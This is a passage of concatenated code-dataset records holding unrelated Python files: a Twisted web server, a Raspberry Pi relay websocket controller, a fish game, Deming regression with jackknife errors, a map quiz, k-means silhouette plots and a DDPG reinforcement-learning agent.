Y_scaler.min_[0]))\n","sub_path":"tutorials/pytorch-tutorial/01.load_data.py","file_name":"01.load_data.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"419286127","text":"import sys, traceback\nsys.path.insert(0, \"/Life/360io/service/io360/patch\")\nsys.path.insert(0, \"/Life/360io/service\")\n\nimport os.path, time\nimport io360.server\nfrom hack.web2 import server, http, resource, channel, iweb, stream, static\nfrom twisted.internet import defer\nfrom Cheetah.Template import Template\nfrom io360 import import_mod, settings\nfrom io360.server.www import import_tmpl\nfrom io360.libs.utils import HardResponder\nfrom io360.server.www.bindings import middleware_bindings\nfrom io360.libs.orm.query import Query\n\nlogic_tree = dict()\nview_tree = dict()\n\nclass IO360HTTP(resource.Resource):\n addSlash = True\n \n def __init__(self, logic_mod, path, mode = 'http'):\n self.logic_mod = logic_mod\n self.path = path\n self.mode = mode\n \n if '__val__' not in view_tree:\n logic_tree['__val__'] = import_mod('.'.join([self.logic_mod,'index']))\n view_tree['__val__'] = import_tmpl('index')\n\n def locateChild(self, req, segs):\n for binding in middleware_bindings:\n binding(req)\n \n try:\n [self.mode, name] = segs[0].split('-')\n except:\n name = segs[0]\n \n if name == '' and len(segs) == 1:\n return self, server.StopTraversal\n if os.path.isfile(os.path.join(self.path, name)):\n return IO360HTTPStatic(self, os.path.join(self.path, name)), []\n elif os.path.exists(os.path.join(self.path, name)):\n return IO360HTTPStatic(self, os.path.join(self.path, name)), segs[1:]\n else:\n logicpath = '.'.join([self.logic_mod,name])\n\n if name not in view_tree:\n try:\n try:\n logic_tree[name] = {'__val__':import_mod(logicpath)}\n except:\n pass\n\n view_tree[name] = {'__val__':import_tmpl(name)}\n except:\n return self, server.StopTraversal\n\n return IO360HTTPView(self, name, view_tree[name], logicpath, logic_tree[name], self.mode), segs[1:]\n\n def renderHTTP(self, req): \n responder = getattr(logic_tree['__val__'], self.mode, logic_tree['__val__'].http)(req)\n view = view_tree['__val__']()\n view.req = req\n \n response = http.Response(200, stream=stream.MemoryStream(view.respond().encode('utf8')))\n response.headers.setRawHeaders('Content-Type', ['text/html; charset=utf-8'])\n \n if responder:\n responder(response)\n return response \n\nclass IO360HTTPView(resource.Resource):\n addSlash = True\n\n def __init__(self, root, viewpath, view, logicpath, logic, mode = 'http'):\n self.root = root\n self.viewpath = viewpath\n self.logicpath = logicpath\n self.view = view\n self.logic = logic\n self.mode = mode\n \n def locateChild(self, req, segs):\n name = segs[0]\n \n self.logicpath = '.'.join([self.logicpath,name])\n self.viewpath = '.'.join([self.viewpath,name])\n \n if name == '' and len(segs) == 1:\n return self, server.StopTraversal\n elif name not in self.view:\n try:\n self.view[name] = {'__val__':import_tmpl(self.viewpath)}\n self.view = self.view[name]\n \n try:\n if type(self.logic) is not type([]):\n self.logic[name] = {'__val__':import_mod(self.logicpath)}\n self.logic = self.logic[name]\n except:\n self.logic = [self.logic]\n except:\n return self, server.StopTraversal\n else:\n self.view = self.view[name]\n try:\n if type(self.logic) is not type([]):\n self.logic = self.logic[name]\n except:\n self.logic = self.logic\n return self, segs[1:]\n\n def renderHTTP(self, req):\n if type(self.logic) is type([]):\n self.logic = self.logic[0]\n \n mode = self.mode + '_' + req.method\n logic = getattr(self.logic['__val__'], mode, self.logic['__val__'].http)\n \n if req.method == 'POST':\n return server.parsePOSTData(req).addCallback(self.renderDeferred, *[req, logic])\n else:\n return self.renderDeferred(None, req, logic)\n \n def renderDeferred(self, dcb, req, logic):\n deferredLogic = defer.maybeDeferred(logic, req)\n \n def renderCallback(responder):\n if isinstance(responder, HardResponder):\n return responder.response(getattr(req, 'cookies', None))\n\n view = self.view['__val__']()\n view.req = req\n responseData = view.respond().encode('utf8')\n\n response = http.Response(200, stream=stream.MemoryStream(responseData))\n response.headers.setRawHeaders('Content-Type', ['text/html; charset=utf-8'])\n\n if getattr(req, 'cookies', None):\n response.headers.setHeader('Set-Cookie', req.cookies)\n\n if responder:\n responder(response)\n\n return response\n\n return deferredLogic.addCallback(renderCallback)\n \nclass IO360HTTPStatic(resource.Resource):\n addSlash = True\n\n def __init__(self, root, path):\n self.root = root\n self.path = path\n\n def locateChild(self, req, segs):\n if not segs:\n return None, server.StopTraversal\n\n name = segs[0]\n self.path = os.path.join(self.path, name)\n if not os.path.exists(self.path):\n return None, server.StopTraversal\n elif os.path.isdir(self.path):\n return IO360HTTPStatic(self.root, self.path), segs[1:]\n else:\n return self, server.StopTraversal\n\n def renderHTTP(self, req):\n if os.path.isfile(self.path):\n return static.File(self.path)\n else:\n return http.Response(200, stream=stream.MemoryStream('forbidden'))\n\nsite = server.Site(IO360HTTP('io360.logic', os.path.join(os.path.dirname(os.getcwd()), 'server/www/static')))\n\ntry:\n from twisted.internet import cfreactor\n cfreactor.install()\nexcept:\n try:\n from twisted.internet import epollreactor\n epollreactor.install()\n except:\n pass\n\nfrom twisted.application import service, strports\napplication = service.Application(\"io360\")\nservice = strports.service('tcp:1080', channel.HTTPFactory(site))\nservice.setServiceParent(application)","sub_path":"service/io360/bin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"313851441","text":"import asyncio\nimport websockets\nimport json\nimport relay\nimport config\nimport time\nimport threading\nimport mcp3008\nimport time\nimport RPi.GPIO as GPIO\n#from temperature import read_temp\n\nrelaycount = 16\nsensorcount = 16\n# BCM pins.(pin 4 for is for thermometer.)\npinlist = [2, 3, 27, 22, 0, 5, 6, 13, 26, 14, 15, 23, 24, 25, 1, 12]\n\nrelayon = [False] * relaycount\nsensorval = [0] * sensorcount\n\n# status = {\"relayon\":relayon, \"sensorval\":sensorval}\n\ncontroller = relay.RelayControll(pinlist, relaycount)\n\n# controller.turnOnRelay(relaynum,duration)\n\"\"\"time.sleep(2)\ncontroller.turnOffRelay(0)\ncontroller.turnOnRelay(0,5)\ntime.sleep(2)\ncontroller.cleanup()\"\"\"\n\"\"\"\n# Getting temperature and storing in config.status[].\ntemp = read_temp()[0]\nconfig.status[\"temperature\"] = temp\nprint(config.status[\"temperature\"])\nprint(config.temperature)\nprint(time.strftime(\"%H:%M %d %b %Y, %a \"))\n\"\"\"\n# Getting moisture reading and storing in config.status[].\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(16, GPIO.OUT)\ndef get_reading():\n GPIO.output(16, GPIO.HIGH)\n time.sleep(0.1)\n while True:\n for i in range(0, config.numchip):\n for j in range(0, config.numinputs):\n config.reading_arr[i*config.numinputs+j] = mcp3008.readadc(j, i)\n config.status[\"sensorval\"] = config.reading_arr\n # Sleeping to let the thread finnish getting reading.(?)\n time.sleep(0.5)\n GPIO.output(16, GPIO.LOW)\n\n# Getting reading on new thread(in order to parrallelize).\ntry:\n thread = threading.Thread(target=get_reading, args=())\n thread.start()\n\n async def handler(websocket, path):\n consumer_task = asyncio.ensure_future(consumer_handler(websocket))\n producer_task = asyncio.ensure_future(producer_handler(websocket))\n done, pending = await asyncio.wait(\n [consumer_task, producer_task],\n return_when=asyncio.FIRST_COMPLETED,\n )\n\n for task in pending:\n task.cancel()\n\n async def consumer_handler(websocket):\n async for message in websocket:\n await consumer(message)\n\n async def producer_handler(websocket):\n while True:\n message = await producer()\n await websocket.send(message)\n await asyncio.sleep(0.1)\n\n async def consumer(message):\n message = json.loads(message)\n relaynum = int(message[\"relaynum\"])\n config.status[\"duration\"] = int(message[\"duration\"])\n if message[\"turn\"] is True:\n controller.turnOnRelay(relaynum, config.status[\"duration\"])\n\n async def producer():\n message = json.dumps(config.status)\n return message\n\n start_server = websockets.serve(handler, '192.168.1.202',9998)\n #start_server = websockets.serve(handler, '127.0.0.1', 9998)\n # start_server = websockets.serve(handler, '192.168.2.144', 9998)\n # start_server = websockets.serve(handler, '192.168.1.210',9998)\n # start_server = websockets.serve(handler, '192.168.2.100',9998)\n\n asyncio.get_event_loop().run_until_complete(start_server)\n asyncio.get_event_loop().run_forever()\n\nexcept KeyboardInterrupt:\n controller.cleanup()\n","sub_path":"webtest.py","file_name":"webtest.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"544608322","text":"# peter\n# Created on: Sep 2016\n# Created for: ICS3U\n# This scene shows the main menu.\n\nfrom scene import *\nimport ui\nfrom numpy import random\n\n\nclass main_game_scene(Scene):\n def setup(self):\n # this method is called, when user moves to this scene\n self.size_of_screen_x = self.size.x\n self.size_of_screen_y = self.size.y\n self.screen_center_x = self.size_of_screen_x/2\n self.screen_center_y = self.size_of_screen_y/2\n \n self.fishes = []\n self.fishes_move_speed = 10.0\n self.scale_size = 0.75\n self.fish_rate = 1\n \n # add background color\n background_position = Vector2(self.screen_center_x,\n self.screen_center_y)\n self.background = SpriteNode('./assets/sprites/main_game_scene_one.jpg',\n position = background_position, \n parent = self, \n size = self.size)\n \n \n player_position = Vector2()\n player_position.x = self.screen_center_x\n player_position.y = 100\n self.player = SpriteNode('./assets/sprites/player_fish.PNG',\n parent = self,\n position = player_position,\n scale = 0.1)\n \n def update(self):\n # this method is called, hopefully, 60 times a second\n fish_create_chance = random.randint(1,25)\n if fish_create_chance <= self.fish_rate:\n self.add_fish_three()\n fish_create_chance = random.randint(1,25)\n if fish_create_chance <= self.fish_rate:\n self.add_fish_two()\n fish_create_chance = random.randint(1,25)\n if fish_create_chance <= self.fish_rate:\n self.add_fish()\n \n if len(self.fishes) > 0:\n for fish_hit in self.fishes:\n if fish_hit.frame.intersects(self.player.frame):\n self.player.remove\n fish_hit.remove\n self.fishes.remove(fish_hit)\n else:\n pass\n \n def touch_began(self, touch):\n # this method is called, when user touches the screen\n player = self.size/2\n player.x = player.x+0\n self.player = SpriteNode('./assets/sprites/player_fish.png')\n \n \n def touch_moved(self, touch):\n # this method is called, when user moves a finger around on the screen\n if self.player.frame.contains_point(touch.location):\n self.player.position = touch.location\n \n def touch_ended(self, touch):\n # this method is called, when user releases a finger from the screen\n pass\n \n def did_change_size(self):\n # this method is called, when user changes the orientation of the screen\n # thus changing the size of each dimension\n pass\n \n def pause(self):\n # this method is called, when user touches the home button\n # save anything before app is put to background\n pass\n \n def resume(self):\n # this method is called, when user place app from background \n # back into use. Reload anything you might need.\n pass\n \n def add_fish(self):\n fish_start_position = Vector2()\n fish_start_position.x = self.size_of_screen_x - 100\n fish_start_position.y = random.randint(10, \n self.size_of_screen_y - 100)\n \n fish_end_position = Vector2() \n fish_end_position.x = - 100\n fish_end_position.y = random.randint(100,\n self.screen_center_y - 100)\n \n self.fishes.append(SpriteNode('./assets/sprites/small_fish.PNG',\n position = fish_start_position,\n parent = self,\n scale = 0.12)) \n \n fishMoveAction = Action.move_to(fish_end_position.x,\n fish_end_position.y,\n self.fishes_move_speed,\n TIMING_SINODIAL)\n \n self.fishes[len(self.fishes)-1].run_action(fishMoveAction) \n \n \n def add_fish_two(self):\n fish_start_position = Vector2()\n fish_start_position.x = self.size_of_screen_x - 100\n fish_start_position.y = random.randint(100, \n self.size_of_screen_y - 100)\n \n fish_end_position = Vector2() \n fish_end_position.x = - 100\n fish_end_position.y = random.randint(100,\n self.screen_center_y - 100)\n \n self.fishes.append(SpriteNode('./assets/sprites/medium_fish.PNG',\n position = fish_start_position,\n parent = self,\n scale = 0.12)) \n \n fishMoveAction = Action.move_to(fish_end_position.x,\n fish_end_position.y,\n self.fishes_move_speed,\n TIMING_SINODIAL)\n \n self.fishes[len(self.fishes)-1].run_action(fishMoveAction) \n \n def add_fish_three(self):\n fish_start_position = Vector2()\n fish_start_position.x = self.size_of_screen_x - 100\n fish_start_position.y = random.randint(100, \n self.size_of_screen_y - 100)\n \n fish_end_position = Vector2() \n fish_end_position.x = - 150\n fish_end_position.y = random.randint(10,\n self.screen_center_y - 100)\n \n self.fishes.append(SpriteNode('./assets/sprites/large_fish.PNG',\n position = fish_start_position,\n parent = self,\n scale = 0.18)) \n \n fishMoveAction = Action.move_to(fish_end_position.x,\n fish_end_position.y,\n self.fishes_move_speed,\n TIMING_SINODIAL)\n \n self.fishes[len(self.fishes)-1].run_action(fishMoveAction)\n","sub_path":"main_game_scene_one.py","file_name":"main_game_scene_one.py","file_ext":"py","file_size_in_byte":7249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"140291658","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 8 14:57:52 2019\n\n@author: roman\n\"\"\"\n\n\"\"\"\nScript used for doing DemingRegression with the JackKnife Method\nSource of calculation: https://ncss-wpengine.netdna-ssl.com/wp-content/themes/ncss/pdf/Procedures/NCSS/Deming_Regression.pdf\nImplementation: Roman Wixinger\n\"\"\"\n\n\nimport numpy as np\nfrom scipy.special import erfc\nimport scipy.stats as sts \n\ndef deming_regression(x, y, x_err, y_err, alpha = 0.05):\n \n #Constants used for calculating the fit parameters\n x_bar = np.mean(x) \n y_bar = np.mean(y)\n \n n = len(x)\n \n #Covariation matrix\n cov = np.cov(x,y)\n \n p = cov[1,0] #np.sum((x - x_bar * n_arr) * (y - y_bar * n_arr))\n u = cov[0,0] #np.sum((x - x_bar * n_arr)**2)\n q = cov[1,1] #np.sum((y - y_bar * n_arr)**2)\n \n #Variation of the error in x and y\n V_epsilon = np.sum(x_err)**2 / n\n V_delta = np.sum(y_err)**2 / n\n \n #Ratio of the error -> Which deviation should be weighted more\n Lambda = V_epsilon / V_delta\n \n #Calculate the fit parameters\n b1 = (Lambda * q - u + np.sqrt((u - Lambda*q)**2 + 4*Lambda*p**2))/(2*Lambda*p)\n b0 = y_bar - b1*x_bar\n \n fitparam = np.array([b1, b0])\n fit_function = np.poly1d(fitparam) \n \n return fitparam, fit_function\n\n\ndef jackKnife(x, y, x_err, y_err, alpha = 0.05):\n \"\"\"\n Input: theta\n Source: https://ncss-wpengine.netdna-ssl.com/wp-content/themes/ncss/pdf/Procedures/NCSS/Deming_Regression.pdf\n Return: SE(theta) the jackknife estimation for the standard error\n \"\"\"\n \n x_bar = np.mean(x) \n n = len(x)\n\n #Get the estimation \n fitparam, _ = deming_regression(x, y, x_err, y_err)\n theta_b1 = fitparam[0]\n theta_b0 = fitparam[1]\n \n # i-th pseudovariate to be calculated in loop\n theta_star_b1 = np.zeros_like(x)\n theta_star_b0 = np.zeros_like(x)\n \n for i in range(n):\n x_i = np.delete(x, i)\n y_i = np.delete(y, i)\n x_err_i = np.delete(x_err, i)\n y_err_i = np.delete(y_err, i)\n \n #Calculate estimate from sample without i\n fitparam_i, _ = deming_regression(x_i, y_i, x_err_i, y_err_i)\n theta_b1_i = fitparam_i[0]\n theta_b0_i = fitparam_i[1]\n \n #Estimate i-th pseudovariate\n theta_star_b1[i] = n*theta_b1 - (n-1)*theta_b1_i\n theta_star_b0[i] = n*theta_b0 - (n-1)*theta_b0_i\n \n #Estimation for b1, b0 with the jackKnife method\n theta_jackKnife_b1 = np.sum(theta_star_b1) / n\n theta_jackKnife_b0 = np.sum(theta_star_b0) / n\n \n #Variance calculation\n V_J_b1 = np.sum((theta_jackKnife_b1*np.ones_like(theta_star_b1) - theta_star_b1)**2) / (n-1)\n V_J_b0 = np.sum((theta_jackKnife_b0*np.ones_like(theta_star_b0) - theta_star_b0)**2) / (n-1)\n \n #Jackknife estimate for the standard error without tna\n SE_b1 = np.sqrt(V_J_b1 / n)\n SE_b0 = np.sqrt(V_J_b0 / n)\n \n #Student-T: https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.stats.t.html\n tna = sts.t.ppf(1.0 - alpha / 2.0, n - 2)\n \n #Standard error of fit parameter\n std_b1 = tna * SE_b1\n std_b0 = tna * SE_b0\n \n return std_b1, std_b0","sub_path":"GroveTemp3/DemingRegression.py","file_name":"DemingRegression.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"293658292","text":"from turtle import Turtle, Screen\r\nimport pandas\r\n\r\nscreen = Screen()\r\nscreen.title(\"Indian States Game\")\r\nscreen.setup(600, 600)\r\nscreen.bgpic(\"india.gif\")\r\n\r\nt = Turtle()\r\nt.penup()\r\nt.hideturtle()\r\nt.shapesize(0.1, 0.1)\r\nt.shape(\"circle\")\r\nt.color(\"green\")\r\n\r\ndata = pandas.read_csv(\"indian_states.csv\")\r\nall_states = data.state.to_list()\r\nguessed_states = []\r\nwhile len(guessed_states) < 37:\r\n guess = len(guessed_states)\r\n state = screen.textinput(f\"{guess}/36 states guessed correctly.\", \"What's another state name?\").title()\r\n\r\n if state == \"Exit\" or state == \"exit\":\r\n break\r\n if state in all_states:\r\n guessed_states.append(state)\r\n t.goto(data[data[\"state\"] == state][\"x\"].item(), data[data[\"state\"] == state][\"y\"].item())\r\n t.stamp()\r\n t.write(state, align=\"center\", font=(\"Ariel\", 8, \"bold\"))\r\n","sub_path":"Python/States of india Quiz/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"20761502","text":"# code found at http://scikit-learn.org/stable/auto_examples/cluster/plot_kmeans_silhouette_analysis.html\n\nfrom __future__ import print_function\nfrom os.path import dirname, realpath\nimport sys\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import silhouette_samples, silhouette_score\n\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np\n\nfrom helpers.dim_reduction import get_data\nfrom helpers.constants import SVD_DIMS_R, SVD_DIMS_C\n\nprint(__doc__)\n\ndir_path = dirname(realpath(__file__))\noutput_dir = sys.argv[1] if len(sys.argv) >= 2 else 'BASE'\nOUTPUT = '{}/../OUTPUT'.format(dir_path)\nOUT = '{}/{}'.format(OUTPUT, output_dir)\n#BASE = '{}/../OUTPUT/BASE'.format(dir_path)\nBASE = OUT\n\nr_components = [8, 13, 21, 34, 55, 89, 104, 119, 134, 159]\nc_components = [8, 10, 14, 18, 25, 35, 45, 55, 65, 75]\nrange_n_clusters = c_components\n\ndef main(X, ds=\"\", xtra_title=\"\"):\n for n_clusters in range_n_clusters:\n # Create a subplot with 1 row and 2 columns\n fig, (ax1, ax2) = plt.subplots(1, 2)\n fig.set_size_inches(18, 7)\n\n # The 1st subplot is the silhouette plot\n # The silhouette coefficient can range from -1, 1 but in this example all\n # lie within [-0.1, 1]\n ax1.set_xlim([-0.2, 1])\n # The (n_clusters+1)*10 is for inserting blank space between silhouette\n # plots of individual clusters, to demarcate them clearly.\n ax1.set_ylim([0, len(X) + (n_clusters + 1) * 10])\n\n # Initialize the clusterer with n_clusters value and a random generator\n # seed of 10 for reproducibility.\n clusterer = KMeans(n_clusters=n_clusters, random_state=10)\n cluster_labels = clusterer.fit_predict(X)\n\n # The silhouette_score gives the average value for all the samples.\n # This gives a perspective into the density and separation of the formed\n # clusters\n silhouette_avg = silhouette_score(X, cluster_labels)\n print(\"For n_clusters =\", n_clusters,\n \"The average silhouette_score is :\", silhouette_avg)\n\n # Compute the silhouette scores for each sample\n sample_silhouette_values = silhouette_samples(X, cluster_labels)\n\n y_lower = 10\n for i in range(n_clusters):\n # Aggregate the silhouette scores for samples belonging to\n # cluster i, and sort them\n ith_cluster_silhouette_values = \\\n sample_silhouette_values[cluster_labels == i]\n\n ith_cluster_silhouette_values.sort()\n\n size_cluster_i = ith_cluster_silhouette_values.shape[0]\n y_upper = y_lower + size_cluster_i\n\n color = cm.nipy_spectral(float(i) / n_clusters)\n ax1.fill_betweenx(np.arange(y_lower, y_upper),\n 0, ith_cluster_silhouette_values,\n facecolor=color, edgecolor=color, alpha=0.7)\n\n # Label the silhouette plots with their cluster numbers at the middle\n #ax1.text(-.35, y_lower + 0.5 * size_cluster_i, str(i))\n\n # Compute the new y_lower for next plot\n y_lower = y_upper + 10 # 10 for the 0 samples\n\n ax1.set_title(\"%s Silhouette plot (%d clusters)%s\" % (ds, n_clusters, xtra_title))\n ax1.set_xlabel(\"The silhouette coefficient values\")\n ax1.set_ylabel(\"Cluster label\")\n\n # The vertical line for average silhouette score of all the values\n ax1.axvline(x=silhouette_avg, color=\"red\", linestyle=\"--\")\n\n ax1.set_yticks([]) # Clear the yaxis labels / ticks\n ax1.set_xticks([-0.4, -0.2, 0, 0.2, 0.4, 0.6, 0.8, 1])\n\n # 2nd Plot showing the actual clusters formed\n colors = cm.nipy_spectral(cluster_labels.astype(float) / n_clusters)\n ax2.scatter(X[:, 0], X[:, 1], marker='.', s=30, lw=0, alpha=0.7,\n c=colors, edgecolor='k')\n\n # Labeling the clusters\n centers = clusterer.cluster_centers_\n # Draw white circles at cluster centers\n ax2.scatter(centers[:, 0], centers[:, 1], marker='o',\n c=\"white\", alpha=1, s=200, edgecolor='k')\n\n for i, c in enumerate(centers):\n ax2.scatter(c[0], c[1], marker='$%d$' % i, alpha=1,\n s=50, edgecolor='k')\n\n ax2.set_title(\"The visualization of the clustered data.\")\n ax2.set_xlabel(\"Feature space for the 1st feature\")\n ax2.set_ylabel(\"Feature space for the 2nd feature\")\n\n plt.suptitle((\"Silhouette analysis for KMeans clustering on sample data \"\n \"with n_clusters = %d\" % n_clusters),\n fontsize=14, fontweight='bold')\n\n plt.show()\n\ndef ICA():\n global range_n_clusters\n range_n_clusters = [i for i in range(5, 62, 8)]\n _r, _c = get_data('{}/ICA'.format(OUTPUT), '37-')\n c_X, _ = _c\n main(c_X)\n _r, _c = get_data('{}/ICA'.format(OUTPUT), '45-')\n r_X, _ = _r\n main(r_X)\n\ndef RP():\n global range_n_clusters\n range_n_clusters = [16, 30, 45]\n def runitc(p):\n _r, _c = get_data('{}/RP'.format(OUTPUT), '%s-' % p)\n c_X, _ = _c\n print('Cancer at %s dimensions' % p)\n main(c_X, 'Cancer', ' (%s dims)' % p)\n for i in ['16', '23', '30', '37', '44']:\n runitc(i)\n def runitr(p):\n _r, _c = get_data('{}/RP'.format(OUTPUT), '%s-' % p)\n r_X, _ = _r\n print('Reviews at %s dimensions' % p)\n main(r_X, 'Reviews', ' (%s dims)' % p)\n for i in ['44', '51', '65', '72', '79']:\n runitr(i)\n\ndef PCA():\n def runit(p):\n _r, _c = get_data('{}/PCA'.format(OUTPUT), '%s-' % p)\n r_X, _ = _r\n c_X, _ = _c\n main(r_X)\n main(c_X)\n for i in ['0.6']: #, '0.7', '0.8', '0.9']]\n runit(i)\n\ndef SVD():\n global range_n_clusters\n range_n_clusters = [18, 19, 20, 21, 22]#[16, 30, 45]\n def runitc(p):\n c_X, _ = get_data('{}/SVD'.format(OUTPUT), '%s-' % p, 'c')\n print('Cancer at %s dimensions' % p)\n main(c_X, 'Cancer', ' (%s dims)' % p)\n for i in SVD_DIMS_C:\n runitc(i)\n def runitr(p):\n r_X, _ = get_data('{}/SVD'.format(OUTPUT), '%d-' % p, 'r')\n print('Reviews at %s dimensions' % p)\n main(r_X, 'Reviews', ' (%s dims)' % p)\n for i in SVD_DIMS_R:\n runitr(i)\n\nif __name__ == '__main__':\n if sys.argv[1] == 'ICA':\n ICA()\n if sys.argv[1] == 'RP':\n RP()\n elif sys.argv[1] == 'PCA':\n PCA()\n elif sys.argv[1] == 'SVD':\n SVD()\n","sub_path":"src/silhouette.py","file_name":"silhouette.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"82777469","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# import libraries\nimport time\nimport random\nimport argparse\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nimport gym\n\n# create replay buffer\nclass Episode_experience():\n def __init__(self):\n # initialize buffer\n self.memory = []\n \n def add(self, state, action, reward, next_state, done, goal):\n # add tuple of experience to buffer\n self.memory += [(state, action, reward, next_state, done, goal)]\n \n def clear(self):\n # clear the buffer\n self.memory = []\n \nclass DDPGAgent:\n def __init__(self, action_low=-1, action_high=1, gamma=0.98, actor_learning_rate=0.001, \n critic_learning_rate=0.001, tau=1e-3):\n \n # initialize limits for action clipping\n self.action_low = action_low\n self.action_high = action_high\n \n # setup variables for RL\n self.tau = tau \n self.gamma = gamma \n self.batch_size = 64\n self.gradient_norm_clip = None\n self.a_learning_rate = actor_learning_rate\n self.c_learning_rate = critic_learning_rate \n \n # initialize experience buffer\n self.memory = []\n self.buffer_size = int(5e5)\n \n # create a neural network\n self._construct_nets()\n \n def _construct_nets(self):\n # initialize computation graph\n #tf.reset_default_graph()\n self.sess = tf.Session()\n \n # initialize palce holders for computation\n self.R = tf.placeholder(tf.float32, [None, ], 'r')\n self.D = tf.placeholder(tf.float32, [None, ], 'done')\n self.G = tf.placeholder(tf.float32, [None, 3], 'goal')\n self.S = tf.placeholder(tf.float32, [None, 25], 'state')\n self.S_ = tf.placeholder(tf.float32, [None, 25], 'next_state')\n \n # create actor and critic networks along with target networks\n with tf.variable_scope('Actor'):\n self.a = self._build_a(self.S, self.G, scope='eval')\n self.a_ = self._build_a(self.S_, self.G, scope='target')\n with tf.variable_scope('Critic'):\n self.q = self._build_c(self.S, self.a, self.G, scope='eval')\n self.q_ = self._build_c(self.S_, self.a_, self.G, scope='target')\n \n # get list of parameters for each network\n self.ae_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,\n scope='Actor/eval')\n self.at_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, \n scope='Actor/target')\n self.ce_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, \n scope='Critic/eval')\n self.ct_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, \n scope='Critic/target')\n\n # soft update operation of target networks\n self.soft_update_op = [[tf.assign(ta, (1 - self.tau) * ta + self.tau * ea), \n tf.assign(tc, (1 - self.tau) * tc + self.tau * ec)]\n for ta, ea, tc, ec in zip(self.at_params, self.ae_params, self.ct_params, self.ce_params)]\n\n # operation to compute target q value\n q_target = self.R + self.gamma * (1-self.D) * self.q_\n \n # loss function for actor and critic networks\n self.c_loss = tf.losses.mean_squared_error(q_target, self.q)\n self.a_loss = - tf.reduce_mean(self.q)\n \n # perform optimization based on gradient clipping\n if self.gradient_norm_clip is not None:\n # initialize critic optimizer\n c_optimizer = tf.train.AdamOptimizer(self.c_learning_rate)\n c_gradients = c_optimizer.compute_gradients(self.c_loss, \n var_list=self.ce_params)\n \n # perform gradient clipping\n for i, (grad, var) in enumerate(c_gradients):\n if grad is not None:\n c_gradients[i] = (tf.clip_by_norm(grad, self.gradient_norm_clip), var)\n self.c_train = c_optimizer.apply_gradients(c_gradients)\n \n # initialize actor optimizer\n a_optimizer = tf.train.AdamOptimizer(self.a_learning_rate)\n a_gradients = c_optimizer.compute_gradients(self.a_loss, \n var_list=self.ae_params)\n \n # perform gradient clipping\n for i, (grad, var) in enumerate(a_gradients):\n if grad is not None:\n a_gradients[i] = (tf.clip_by_norm(grad, self.gradient_norm_clip), var)\n self.a_train = a_optimizer.apply_gradients(a_gradients)\n else:\n # perform optimization without gradient clipping\n self.c_train = tf.train.AdamOptimizer(self.c_learning_rate).minimize(self.c_loss, var_list=self.ce_params)\n self.a_train = tf.train.AdamOptimizer(self.a_learning_rate).minimize(self.a_loss, var_list=self.ae_params)\n \n # initialize model saver\n self.saver = tf.train.Saver() \n \n # variable initializer for session\n self.sess.run(tf.global_variables_initializer())\n \n def _build_a(self, s, g, scope): \n # actor network based on UVFA (Schaul et al. 2015)\n with tf.variable_scope(scope):\n # use both state and goal as input for network\n net = tf.concat([s, g], 1) ################################\n net = tf.layers.dense(net, 256, tf.nn.relu)\n net = tf.layers.dense(net, 256, tf.nn.relu)\n net = tf.layers.dense(net, 256, tf.nn.relu)\n a = tf.layers.dense(net, 4, tf.nn.tanh)\n return a * (self.action_high-self.action_low)/2 + (self.action_high+self.action_low)/2\n \n def _build_c(self, s, a, g, scope): \n # critic network based on UVFA (Schaul et al. 2015)\n with tf.variable_scope(scope):\n net = tf.concat([s, a, g], 1) ################################\n net = tf.layers.dense(net, 256, tf.nn.relu)\n net = tf.layers.dense(net, 256, tf.nn.relu)\n net = tf.layers.dense(net, 256, tf.nn.relu)\n return tf.layers.dense(net, 1)\n \n # execute noisy version of policy output\n def choose_action(self, state, goal, variance): \n action = self.sess.run(self.a, {self.S: state, self.G: goal})[0]\n return np.clip(np.random.normal(action, variance), self.action_low, self.action_high)\n \n # append episode experience to replay buffer\n def remember(self, ep_experience):\n self.memory += ep_experience.memory\n if len(self.memory) > self.buffer_size:\n self.memory = self.memory[-self.buffer_size:] # empty the first memories\n \n # network update step from experience replay\n def replay(self, optimization_steps=1):\n # if there's no enough transitions, do nothing\n if len(self.memory) < self.batch_size: \n return 0, 0\n\n # perform optimization for optimization_steps\n a_losses = 0\n c_losses = 0\n for _ in range(optimization_steps):\n # get a minibatch\n minibatch = np.vstack(random.sample(self.memory, self.batch_size))\n\n # stack states, actions and rewards\n ss = np.vstack(minibatch[:,0])\n acs = np.vstack(minibatch[:,1])\n rs = minibatch[:,2]\n nss = np.vstack(minibatch[:,3])\n ds = minibatch[:,4]\n gs = np.vstack(minibatch[:,5]) ################################\n \n # obtain the losses and perform one gradient update step\n a_loss, c_loss, _, _ = self.sess.run([self.a_loss, self.c_loss, self.a_train, self.c_train],\n {self.S: ss, self.a: acs, self.R: rs,\n self.S_: nss, self.D: ds, self.G: gs})\n \n # accumulate losses over steps\n a_losses += a_loss\n c_losses += c_loss\n \n return a_losses/optimization_steps, c_losses/optimization_steps\n \n # utility function to update target network\n def update_target_net(self):\n self.sess.run(self.soft_update_op)\n'''\n# environment to evaluate ddpg\nclass 